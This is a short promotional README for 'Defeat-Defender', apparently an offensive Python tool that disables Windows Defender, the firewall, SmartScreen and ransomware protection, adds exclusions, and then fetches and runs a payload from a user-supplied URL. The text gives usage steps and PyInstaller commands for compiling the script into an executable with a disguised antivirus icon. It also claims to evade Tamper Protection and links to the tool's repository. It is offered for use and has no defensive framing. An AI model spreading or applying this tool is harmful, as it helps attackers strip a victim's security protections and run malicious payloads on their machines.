Defeat-Defender
Defeat Defender is a powerful Python script to disable Windows Defender, firewall, smart screen, and execute the payload.
Usage :
Edit Defeat-Defender.py on line number 42 and replace the direct URL of your payload
Run the script “Defeat-Defender.py”. It will ask for Admin Permission. If permission is Granted The script will work Silently without console windows…
After it gets admin permission it will disable the defender
Features :
▪️PUAProtection
▪️Automatic Sample Submission
▪️Windows Firewall
▪️Windows Smart Screen(Permanently)
▪️Disable Quick scan
▪️Add exe file to exclusions in defender settings
▪️Disable Ransomware Protection
⚙️ Compile To EXE
To compile the script to exe install pyinstaller :
py -m pip install pyinstaller
py installer --clean --onefile --console --icon="icon" Defeat-Defender.py
Icon must be an icon in your path for example antivirus.ico and then you replace it like this :
pyinstaller --clean --onefile --console --icon="antivirus.ico" Defeat-Defender.py
ℹ️ Bypassing Windows-Defender Techniques :
Recently Windows Introduced a new Feature called “Tamper Protection”.
This prevents the disabling of real-time protection and modifying defender registry keys using Powershell or cmd…If you need to disable real-time protection you need to do it manually….But I have done some tricks to run our payload without triggering Defender even “real-time protection” turned on
🔗 Link: https://github.com/alikaptanoglu/Defeat-Defender-Python-Version-